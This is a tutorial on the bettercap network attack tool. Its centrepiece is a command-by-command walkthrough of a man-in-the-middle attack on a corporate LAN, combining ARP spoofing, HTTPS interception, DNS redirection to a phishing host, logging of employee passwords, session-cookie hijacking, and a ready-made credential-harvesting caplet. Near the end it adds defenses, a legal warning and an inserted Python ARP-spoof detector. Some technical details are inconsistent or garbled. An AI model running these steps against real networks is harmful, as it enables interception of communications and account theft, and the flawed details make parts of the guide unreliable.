Tool Deep Dive

Bettercap

Bettercap is a powerful, modular network attack and monitoring tool that supersedes ettercap. Complete installation guide, module reference, and attack walkthroughs for penetration testers.

What Is Bettercap?

Bettercap is an open-source, modular network attack and monitoring tool written in Go by Simone "evilsocket" Margaritelli. It was conceived as a modern replacement for Ettercap, the classic man-in-the-middle (MITM) tool that had become abandoned, poorly maintained, and increasingly difficult to use in contemporary network environments.

Where Ettercap was a monolithic application with a dated GTK interface and brittle plugin system, bettercap was architected from the ground up around three principles:

  • Modularity: Every capability — ARP spoofing, DNS spoofing, HTTP proxy, HTTPS stripping — is a self-contained Go module that can be loaded, configured, and unloaded independently
  • Live interaction: Bettercap has a built-in interactive UI (TUI) that lets you reconfigure the running instance in real time without restarting the process
  • Scriptability: Attack sequences can be written as "caplets" — small Ruby-like scripts — and executed non-interactively for automation

Bettercap handles reconnaissance (passive discovery of hosts, devices, and WiFi networks), spoofing (ARP, DNS, DHCP), proxying (HTTP, HTTPS, HTTP-2), and credential extraction across all stages of a network assessment. It runs on Linux, macOS, and Windows (via WSL2) and has largely displaced Ettercap in professional penetration testing toolkits.

Installation

On Kali Linux

$ sudo apt update && sudo apt install bettercap
$ # Verify installation
$ bettercap -version
bettercap v2.32.0 (built for go1.21 using go modules)

On Raspberry Pi (ARM)

$ # Download the pre-built ARM binary
$ wget https://github.com/bettercap/bettercap/releases/download/v2.32.0/bettercap_v2.32.0_linux_arm64.zip
$ unzip bettercap_v2.32.0_linux_arm64.zip
$ sudo mv bettercap /usr/local/bin/
$ sudo setcap cap_net_admin,cap_net_raw,cap_net_bind_service=eip /usr/local/bin/bettercap

On macOS

$ brew install bettercap
$ # Or via Go:
$ go install github.com/bettercap/bettercap@latest

On Windows (via WSL2)

$ # Install WSL2 and Kali Linux from Microsoft Store
$ wsl -d kali-linux
$ sudo apt update && sudo apt install bettercap
$ # Note: you need a WiFi adapter with monitor mode support (external Alfa recommended)

Core Capabilities

Reconnaissance Module

The net.recon module performs passive network reconnaissance by listening for ARP broadcasts and ICMP neighbor advertisements. It builds a live table of devices on the local network — IP address, MAC address, vendor (via OUI lookup), hostname (via reverse DNS), and first/last seen timestamps.

$ sudo bettercap -iface eth0

╔═══════════════════════════════════════════════════════════════╗
║  bettercap v2.32.0 — type 'help' for a list of commands     ║
╚═══════════════════════════════════════════════════════════════╝

bettercap> net.probe on
[net.probe] module enabled: probing all hosts on the network

bettercap> net.show
[...] IP              MAC                Vendor        Hostname
[...] 192.168.1.1     AA:BB:CC:DD:EE:01  Netgear       router.local
[...] 192.168.1.42    AA:BB:CC:DD:EE:02  Apple, Inc.   iPhone-Jasons
[...] 192.168.1.101   AA:BB:CC:DD:EE:03  Samsung       Samsung-TV
[...] 192.168.1.108   AA:BB:CC:DD:EE:04  Dell Inc.     workstation03

WiFi Reconnaissance

bettercap> wifi.interface wlan0
[wifi] monitoring enabled on wlan0

bettercap> wifi.recon on
[wifi.recon] started, channel hopping every 2s

bettercap> wifi.show
[...] BSSID              SSID           CH  ENC   CLIENTS
[...] AA:BB:CC:DD:EE:0A  Corporate_5G   36  WPA2  12
[...] AA:BB:CC:DD:EE:0B  Corporate      11  WPA2  34
[...] AA:BB:CC:DD:EE:0C  Guest_WiFi      6  OPEN   8
[...] AA:BB:CC:DD:EE:0D  FreeWiFi       48  OPEN   2

Key Modules

arp.spoof — ARP Spoofing

The arp.spoof module performs ARP cache poisoning to position bettercap as a man-in-the-middle on a switched network. It continuously sends forged ARP replies to the target and the default gateway, poisoning both ARP caches so all traffic flows through the attacker.

bettercap> set arp.spoof.targets 192.168.1.42
[...] Set arp.spoof.targets to 192.168.1.42

bettercap> set arp.spoof.internal true
[...] Also spoof the gateway's ARP table (full LAN MITM)

bettercap> arp.spoof on
[arp.spoof] module enabled: ARP spoofing 192.168.1.42
[arp.spoof] Sent forged ARP reply: 192.168.1.1 is at AA:BB:CC:DD:EE:FF

dns.spoof — DNS Spoofing

The dns.spoof module resolves DNS queries to attacker-controlled IP addresses. Combined with the HTTP proxy, it enables phishing campaigns where targets visiting mail.google.com are redirected to a clone hosted on the attacker's machine.

bettercap> set dns.spoof.address 192.168.1.105
[...] Set dns.spoof.address to 192.168.1.105

bettercap> set dns.spoof.domains *
[...] Spoof all domains (* wildcard)

bettercap> dns.spoof on
[dns.spoof] module enabled: DNS spoofing for *
[dns.spoof] 192.168.1.42 asked for mail.google.com → 192.168.1.105
[dns.spoof] 192.168.1.42 asked for vpn.corp.local → 192.168.1.105

http.proxy — HTTP Proxy

The http.proxy module intercepts and optionally modifies HTTP traffic. It can inject HTML, JavaScript, or CSS into responses, log POST credentials, and redirect users. With SSL stripping enabled, it also strips HTTPS from responses before forwarding.

bettercap> set http.proxy.script /usr/local/bettercap/scripts/inject.js
[...] Loaded injection script

bettercap> set http.proxy.injectjs 'alert("XSS by Bettercap")'
[...] Set JavaScript injection payload

bettercap> http.proxy on
[http.proxy] module enabled on 0.0.0.0:80
[http.proxy] POST https://mail.google.com/m:[email protected]
[http.proxy] POST http://192.168.1.1/login:admin|P@ssw0rd!

https.proxy — HTTPS Proxy

The https.proxy module (also called bettercap-tls in older versions) performs HTTPS interception using a dynamically generated CA. When a target browses to an HTTPS site, bettercap generates a certificate on-the-fly signed by its own CA, presents it to the client, and terminates the TLS connection at the proxy. The proxy then opens its own TLS connection to the real destination. This is SSL/TLS MITM, not a weakness in HTTPS itself.

bettercap> set https.proxy.enabled true
bettercap> set https.proxy.cert /usr/local/bettercap/certs/ca.pem
bettercap> set https.proxy.key /usr/local/bettercap/certs/ca.key
bettercap> https.proxy on
[https.proxy] MITM proxy enabled, using certificate authority: CA_2026
[https.proxy] Intercepted HTTPS request: linkedin.com (TLS 1.3)
[https.proxy] Forwarded to: 108.174.10.10:443

wifi — WiFi Reconnaissance and Attacks

The wifi module provides WiFi reconnaissance (channel hopping, SSID discovery, client tracking) and deauthentication attacks. It can send targeted or broadcast deauth frames to disconnect clients from legitimate APs, forcing them to reconnect — ideally to the attacker's fake AP.

bettercap> wifi.recon on
bettercap> wifi.deauth AA:BB:CC:DD:EE:0B
[wifi.deauth] Sending deauth to all clients on AA:BB:CC:DD:EE:0B (Corporate)
[wifi.deauth] Sent 50 deauth frames, 18 clients affected

Real Attack Walkthrough

Scenario: Credential Theft on a Corporate Network

This walkthrough demonstrates a complete man-in-the-middle attack to harvest credentials from an unsuspecting employee on a switched corporate LAN.

$ # Step 1: Launch bettercap with a clean slate
$ sudo bettercap -iface eth0 -caplet /usr/local/share/bettercap/caplets/hide-seen.cap

[syslog] Loaded syslog events watcher
[net.recon] module enabled: starting network reconnaissance

# Step 2: Probe the network and identify targets
bettercap> net.probe on
bettercap> wait 5
bettercap> net.show
[...] Target identified: 192.168.1.108 (Dell workstation)

# Step 3: Enable ARP spoofing against the target and gateway
bettercap> set arp.spoof.targets 192.168.1.108
bettercap> set arp.spoof.internal true
bettercap> arp.spoof on
[arp.spoof] ARP spoofing active — MITM position established

# Step 4: Enable HTTP proxy to log POST credentials
bettercap> set http.proxy.on true
bettercap> http.proxy on
[http.proxy] HTTP proxy enabled on :80

# Step 5: Enable HTTPS proxy for SSL stripping
bettercap> set https.proxy.enabled true
bettercap> https.proxy on
[https.proxy] HTTPS MITM proxy active

# Step 6: Enable DNS spoofing to redirect a phishing page
bettercap> set dns.spoof.address 192.168.1.105
bettercap> set dns.spoof.domains vpn.corp.local
bettercap> dns.spoof on

# Step 7: Watch credentials appear in real time
[http.proxy] POST https://corp-sso.acmecorp.com/login
    username: j.smith
    password: C0rpVpn#2026!
    IP: 192.168.1.108 | MAC: AA:BB:CC:DD:EE:03

# Step 8: Capture session cookies for session hijacking
[http.proxy] Cookie: SESSIONID=9f8a7b6c5d4e3f2a1b0c
    Host: webmail.acmecorp.com | Path: /

Session Hijacking with Captured Cookies

$ # Take the captured SESSIONID and inject it into your browser cookie jar
$ # Using browser dev tools or EditThisCookie Chrome extension:
$ # document.cookie = "SESSIONID=9f8a7b6c5d4e3f2a1b0c"; document.location="https://webmail.acmecorp.com";
[session] Now authenticated as j.smith in your browser session

Caplets — Pre-Written Attack Scripts

Bettercap's caplets are small scripts written in the caplet DSL (based on Go's expression syntax) that automate complex multi-module attacks. Rather than manually typing commands, you execute a single caplet file that configures all modules, sets targets, and launches attacks in the correct sequence.

$ # List available caplets
$ ls /usr/local/share/bettercap/caplets/
dns-spoof.cap      http-req-dump.cap    mii-tool.cap
example.cap        http-simple-auth.cap  net-recon.cap
ftp-mitm.cap       http-ui.cap           wifi-jammer.cap

$ # Run a credential harvesting caplet
$ sudo bettercap -caplet /usr/local/share/bettercap/caplets/http-simple-auth.cap

[caplet] Loaded: http-simple-auth.cap
[http.proxy] Proxy enabled, will intercept basic auth
[arp.spoof] ARP spoofing all hosts on the network

$ # Example: custom credential harvester caplet
$ cat ~/my-harvester.cap

# Custom credential harvester for corporate assessment
set arp.spoof.targets 192.168.1.0/24
set arp.spoof.internal true
arp.spoof on
set http.proxy.on true
set http.proxy.script /usr/local/bettercap/scripts/creds-logger.js
http.proxy on
set https.proxy.enabled true
https.proxy on
set dns.spoof.address 192.168.1.105
set dns.spoof.domains *.acmecorp.com
dns.spoof on

Comparison: Bettercap vs. Mana Toolkit

Aspect             Bettercap                                  Mana Toolkit
-----------------  -----------------------------------------  ---------------------------------------------------
Primary focus      LAN MITM (wired + WiFi)                    WiFi Evil Twin / KARMA
Requires fake AP   No (ARP spoof on existing LAN)             Yes (creates fake AP)
WiFi attacks       Deauth, reconnaissance (limited)           Full KARMA, Evil Twin, credential harvesting via AP
HTTP(S) proxy      Full http.proxy + https.proxy modules      SSLstrip via external tools
Scriptability      Caplets + live TUI reconfiguration         Bash scripts calling hostapd-mana/dnsmasq
Hash capture       Responder integration for LLMNR/NBT-NS     Responder integrated
Deployment speed   Very fast — runs on any existing network   Medium — requires AP setup and channel selection
OS support         Linux, macOS, Windows (WSL2)               Linux (Kali primary)

In practice, penetration testers use both: Mana for WiFi-specific Evil Twin assessments (especially corporate WPA2-Enterprise environments) and bettercap for wired LAN MITM engagements where ARP spoofing on an existing switch is sufficient.

Detection and Defense

Defenders should be aware that bettercap's ARP spoofing is detectable with the right tooling:

  • Static ARP entries: On critical infrastructure, configure static ARP entries for the default gateway. This prevents dynamic spoofing but creates management overhead.
  • ARPWatch / arpalert: These tools monitor ARP tables for unexpected changes and alert when a MAC address suddenly claims a new IP — a classic MITM indicator.
  • 802.1X Port-Based Network Access Control (PNAC): The most effective defense. When the switch authenticates connected devices via 802.1X (and optionally EAP-TLS), an attacker cannot easily inject themselves without a valid supplicant certificate.
  • HTTPS everywhere + certificate pinning: Even if bettercap intercepts HTTPS traffic via MITM, certificate pinning in modern browsers and mobile apps causes the connection to fail rather than fall back to HTTP.
  • LLMNR/NBT-NS disabling: Disable LLMNR (UDP port 5355) and NetBIOS Name Service via Group Policy. This prevents bettercap's Responder integration from capturing hashes trivially.
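
An ARPWatch-style check of the kind the second bullet describes, written here as an added Python example (not part of the page or of bettercap itself): it replays a constructed sequence of ARP replies modelled on the arp.spoof log lines above and alerts on the two signatures a poisoning run leaves in the ARP table, a known IP suddenly bound to a new MAC, and one MAC answering for several IPs. The gateway address, the event list and the severity labels are assumptions for the demo; a real deployment would feed the monitor from a packet capture or periodic `ip neigh` snapshots.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class ArpMonitor:
    """Tracks IP->MAC bindings seen in ARP replies and flags suspicious changes."""
    gateway_ip: str                       # assumed gateway for this demo network
    bindings: dict = field(default_factory=dict)                        # ip -> mac
    ips_by_mac: dict = field(default_factory=lambda: defaultdict(set))  # mac -> {ip}

    def observe(self, ip: str, mac: str) -> list[str]:
        """Record one ARP reply ('ip is at mac') and return any alerts it triggers."""
        mac = mac.upper()
        alerts = []
        known = self.bindings.get(ip)
        # Flip-flop: an IP we already know is now claimed by a different MAC.
        # A gateway flip-flop is the classic arp.spoof indicator, so rate it higher.
        if known is not None and known != mac:
            sev = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            alerts.append(f"{sev} flip-flop: {ip} moved from {known} to {mac}")
        self.bindings[ip] = mac
        self.ips_by_mac[mac].add(ip)
        # Multi-claim: one MAC answering for several IPs is what arp.spoof.internal
        # looks like (it impersonates both target and gateway). Hosts that legitimately
        # hold several addresses should be allow-listed to keep this from being noisy.
        if len(self.ips_by_mac[mac]) > 1:
            claimed = ", ".join(sorted(self.ips_by_mac[mac]))
            alerts.append(f"WARNING multi-claim: {mac} now answers for {claimed}")
        return alerts


def replay(events, gateway_ip):
    """Feed (timestamp, ip, mac) tuples through a fresh monitor; return alert lines."""
    mon = ArpMonitor(gateway_ip)
    return [f"{ts} {a}" for ts, ip, mac in events for a in mon.observe(ip, mac)]


# Constructed ARP replies (not a real capture); addresses mirror the page's example LAN.
SAMPLE_EVENTS = [
    ("10:00:01", "192.168.1.1",   "AA:BB:CC:DD:EE:01"),  # gateway, legitimate
    ("10:00:02", "192.168.1.42",  "AA:BB:CC:DD:EE:02"),  # iPhone, legitimate
    ("10:00:03", "192.168.1.105", "AA:BB:CC:DD:EE:FF"),  # attacker host's own address
    ("10:00:04", "192.168.1.1",   "AA:BB:CC:DD:EE:FF"),  # forged: gateway "is at" attacker
    ("10:00:04", "192.168.1.42",  "AA:BB:CC:DD:EE:FF"),  # forged: target "is at" attacker
]

if __name__ == "__main__":
    for line in replay(SAMPLE_EVENTS, "192.168.1.1"):
        print(line)
```

The three legitimate replies produce no alerts; the two forged replies produce a CRITICAL gateway flip-flop, a WARNING flip-flop for the target, and a multi-claim alert each time the attacker MAC picks up another address.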

Defense Note

The most robust defense is zero-trust network segmentation: critical systems should not share broadcast domains with user workstations. Even if bettercap successfully ARP spoofs a workstation, it should not be able to reach sensitive systems if VLAN segmentation and firewall rules are properly configured.

Legal Note

Running bettercap without explicit written authorization is illegal under the CFAA, Computer Misuse Act, and equivalent statutes globally. Even on your "own" network, intercepting someone else's communications (e.g., a roommate's traffic) without consent can constitute a criminal offense. Always operate within the bounds of a signed penetration testing agreement.